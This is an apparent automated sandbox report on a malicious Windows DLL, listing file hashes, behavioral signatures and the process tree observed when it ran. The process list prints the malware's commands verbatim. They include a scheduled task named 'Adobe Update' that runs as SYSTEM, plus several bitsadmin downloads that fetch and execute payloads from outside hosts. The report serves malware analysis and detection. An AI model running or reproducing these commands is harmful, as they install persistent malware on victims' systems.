Analysis
-
max time kernel
179s -
max time network
34s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
23-11-2022 23:44
Static task
static1
Behavioral task
behavioral1
Sample
14154df4a78dd5275bfb500039bf409ecaa08bd0578ca5ffb55d8088d37aa87c.dll
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
14154df4a78dd5275bfb500039bf409ecaa08bd0578ca5ffb55d8088d37aa87c.dll
Resource
win10v2004-20220901-en
General
-
Target
14154df4a78dd5275bfb500039bf409ecaa08bd0578ca5ffb55d8088d37aa87c.dll
-
Size
287KB
-
MD5
4229afc39bf9aa81526a270a3c8ee7f1
-
SHA1
dd04a8e9e9fc03ff31fc059c8b4350166586eabe
-
SHA256
14154df4a78dd5275bfb500039bf409ecaa08bd0578ca5ffb55d8088d37aa87c
-
SHA512
7227b26de1621132e09a1f9ffa4bf8dfdf1d50737c23f5825587013b94a4dd2ea990c7283c56236cb44a9b5e9dbc141507e138f15414132adc8ad30698dbf3a6
-
SSDEEP
3072:F0+LyPPPvvcSRYun5wGUacVrmR6kIJKYrAjH/ltU9mZdyEWgwxAOTwEhZZ/jPqD0:DLyXtSun5E/jtPuhWgQ/LXjiUQCUB
Malware Config
Signatures
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 1996 268 WerFault.exe rundll32.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Download via BitsAdmin 1 TTPs 4 IoCs
Processes:
bitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exepid process 608 bitsadmin.exe 1636 bitsadmin.exe 976 bitsadmin.exe 1556 bitsadmin.exe -
Suspicious use of WriteProcessMemory 51 IoCs
Processes:
rundll32.exerundll32.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 432 wrote to memory of 268 432 rundll32.exe rundll32.exe PID 432 wrote to memory of 268 432 rundll32.exe rundll32.exe PID 432 wrote to memory of 268 432 rundll32.exe rundll32.exe PID 432 wrote to memory of 268 432 rundll32.exe rundll32.exe PID 432 wrote to memory of 268 432 rundll32.exe rundll32.exe PID 432 wrote to memory of 268 432 rundll32.exe rundll32.exe PID 432 wrote to memory of 268 432 rundll32.exe rundll32.exe PID 268 wrote to memory of 1012 268 rundll32.exe cmd.exe PID 268 wrote to memory of 1012 268 rundll32.exe cmd.exe PID 268 wrote to memory of 1012 268 rundll32.exe cmd.exe PID 268 wrote to memory of 1012 268 rundll32.exe cmd.exe PID 268 wrote to memory of 1568 268 rundll32.exe cmd.exe PID 268 wrote to memory of 1568 268 rundll32.exe cmd.exe PID 268 wrote to memory of 1568 268 rundll32.exe cmd.exe PID 268 wrote to memory of 1568 268 rundll32.exe cmd.exe PID 268 wrote to memory of 1840 268 rundll32.exe cmd.exe PID 268 wrote to memory of 1840 268 rundll32.exe cmd.exe PID 268 wrote to memory of 1840 268 rundll32.exe cmd.exe PID 268 wrote to memory of 1840 268 rundll32.exe cmd.exe PID 1012 wrote to memory of 1076 1012 cmd.exe schtasks.exe PID 1012 wrote to memory of 1076 1012 cmd.exe schtasks.exe PID 1012 wrote to memory of 1076 1012 cmd.exe schtasks.exe PID 1012 wrote to memory of 1076 1012 cmd.exe schtasks.exe PID 268 wrote to memory of 1760 268 rundll32.exe cmd.exe PID 268 wrote to memory of 1760 268 rundll32.exe cmd.exe PID 268 wrote to memory of 1760 268 rundll32.exe cmd.exe PID 268 wrote to memory of 1760 268 rundll32.exe cmd.exe PID 1568 wrote to memory of 608 1568 cmd.exe bitsadmin.exe PID 1568 wrote to memory of 608 1568 cmd.exe bitsadmin.exe PID 1568 wrote to memory of 608 1568 cmd.exe bitsadmin.exe PID 1568 wrote to memory of 608 1568 cmd.exe bitsadmin.exe PID 268 wrote to memory of 512 268 rundll32.exe cmd.exe PID 268 wrote to memory of 512 268 rundll32.exe cmd.exe PID 268 wrote to memory of 512 268 rundll32.exe cmd.exe PID 268 wrote to memory of 512 268 rundll32.exe cmd.exe PID 268 wrote to memory of 1996 268 rundll32.exe WerFault.exe PID 268 wrote to memory of 1996 268 rundll32.exe WerFault.exe PID 268 wrote to memory of 1996 268 rundll32.exe WerFault.exe PID 268 wrote to memory of 1996 268 rundll32.exe WerFault.exe PID 512 wrote to memory of 1556 512 cmd.exe bitsadmin.exe PID 512 wrote to memory of 1556 512 cmd.exe bitsadmin.exe PID 512 wrote to memory of 1556 512 cmd.exe bitsadmin.exe PID 512 wrote to memory of 1556 512 cmd.exe bitsadmin.exe PID 1840 wrote to memory of 1636 1840 cmd.exe bitsadmin.exe PID 1840 wrote to memory of 1636 1840 cmd.exe bitsadmin.exe PID 1840 wrote to memory of 1636 1840 cmd.exe bitsadmin.exe PID 1840 wrote to memory of 1636 1840 cmd.exe bitsadmin.exe PID 1760 wrote to memory of 976 1760 cmd.exe bitsadmin.exe PID 1760 wrote to memory of 976 1760 cmd.exe bitsadmin.exe PID 1760 wrote to memory of 976 1760 cmd.exe bitsadmin.exe PID 1760 wrote to memory of 976 1760 cmd.exe bitsadmin.exe
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\14154df4a78dd5275bfb500039bf409ecaa08bd0578ca5ffb55d8088d37aa87c.dll,#11⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\14154df4a78dd5275bfb500039bf409ecaa08bd0578ca5ffb55d8088d37aa87c.dll,#12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /CREATE /SC onstart /DELAY 0015:00 /TN "Adobe Update" /TR "cmd /c bitsadmin /transfer My /Download /PRIORITY HIGH http://migre.es/b001.jpg %TEMP%\b001.cpl &%TEMP%\b001.cpl" /ru SYSTEM /f3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /SC onstart /DELAY 0015:00 /TN "Adobe Update" /TR "cmd /c bitsadmin /transfer My /Download /PRIORITY HIGH http://migre.es/b001.jpg C:\Users\Admin\AppData\Local\Temp\b001.cpl &C:\Users\Admin\AppData\Local\Temp\b001.cpl" /ru SYSTEM /f4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C bitsadmin /transfer myDownload /Download /Priority HIGH "http://gpcentroautomotivo.com/b001/Anonymizer.dll" "C:\Users\Admin\AppData\Roaming\Microsoft\Google\Anonymizer.dll"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /transfer myDownload /Download /Priority HIGH "http://gpcentroautomotivo.com/b001/Anonymizer.dll" "C:\Users\Admin\AppData\Roaming\Microsoft\Google\Anonymizer.dll"4⤵
- Download via BitsAdmin
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C bitsadmin /transfer myDownload /Download /Priority HIGH "http://gpcentroautomotivo.com/b001/manifest.json.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Google\manifest.json"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /transfer myDownload /Download /Priority HIGH "http://gpcentroautomotivo.com/b001/manifest.json.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Google\manifest.json"4⤵
- Download via BitsAdmin
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C bitsadmin /transfer myDownload /Download /Priority HIGH "http://gpcentroautomotivo.com/b001/Migre.dll" "C:\Users\Admin\AppData\Roaming\Microsoft\Google\Migre.dll"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /transfer myDownload /Download /Priority HIGH "http://gpcentroautomotivo.com/b001/Migre.dll" "C:\Users\Admin\AppData\Roaming\Microsoft\Google\Migre.dll"4⤵
- Download via BitsAdmin
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 268 -s 3363⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C bitsadmin /transfer myDownload /Download /Priority HIGH "http://gpcentroautomotivo.com/b001/icon.png" "C:\Users\Admin\AppData\Roaming\Microsoft\Google\icon.png"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /transfer myDownload /Download /Priority HIGH "http://gpcentroautomotivo.com/b001/icon.png" "C:\Users\Admin\AppData\Roaming\Microsoft\Google\icon.png"4⤵
- Download via BitsAdmin
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/268-55-0x00000000759F1000-0x00000000759F3000-memory.dmpFilesize
8KB
-
memory/268-56-0x0000000000190000-0x00000000001DD000-memory.dmpFilesize
308KB
-
memory/268-54-0x0000000000000000-mapping.dmp
-
memory/512-63-0x0000000000000000-mapping.dmp
-
memory/608-62-0x0000000000000000-mapping.dmp
-
memory/976-68-0x0000000000000000-mapping.dmp
-
memory/1012-57-0x0000000000000000-mapping.dmp
-
memory/1076-60-0x0000000000000000-mapping.dmp
-
memory/1556-66-0x0000000000000000-mapping.dmp
-
memory/1568-58-0x0000000000000000-mapping.dmp
-
memory/1636-67-0x0000000000000000-mapping.dmp
-
memory/1760-61-0x0000000000000000-mapping.dmp
-
memory/1840-59-0x0000000000000000-mapping.dmp
-
memory/1996-65-0x0000000000000000-mapping.dmp